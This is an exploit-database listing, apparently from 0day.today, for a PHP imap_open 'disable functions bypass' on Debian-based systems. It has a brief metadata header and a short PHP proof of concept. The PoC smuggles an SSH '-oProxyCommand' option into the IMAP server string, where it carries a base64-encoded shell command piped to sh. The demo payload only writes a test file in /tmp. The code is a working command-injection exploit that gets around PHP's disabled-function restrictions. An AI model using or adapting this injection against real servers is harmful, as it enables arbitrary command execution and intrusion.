PHP 5.2.3 imap (Debian Based) - imap_open Disable Functions Bypass Vulnerability

2018-11-16T00:00:00
ID 1337DAY-ID-31635
Type zdt
Reporter Anton Lopanitsyn
Modified 2018-11-16T00:00:00

Description

Exploit for linux platform in category local exploits

                                        
                                            PHP 5.2.3 imap (Debian Based) - imap_open Disable Functions Bypass Vulnerability

<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
 
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
 
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

#  0day.today [2018-11-19]  #